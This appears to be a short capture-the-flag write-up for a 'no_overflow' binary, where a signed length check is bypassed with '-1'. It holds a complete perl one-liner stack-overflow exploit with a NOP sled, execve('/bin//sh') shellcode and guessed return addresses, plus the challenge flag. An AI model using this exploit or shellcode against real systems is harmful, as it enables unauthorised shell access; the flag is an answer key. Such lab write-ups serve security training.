Problem:

This tries to prevent a buffer overflow by asking you how long your input is! Exploit it anyways! The binary can be found at /home/no_overflow/ on the shell server. The source can be found here.

Notes:

Buffer address aprox: 0xffffd5a8
0xffffd5b0

0xffffd5c0

(perl -e 'print "-1\r\n"'; perl -e 'print "\x90"x201 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "\xc0\xd5\xff\xff"x12'; cat) | ./no_overflow

shellcode: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

Flag:

what_is_your_sign

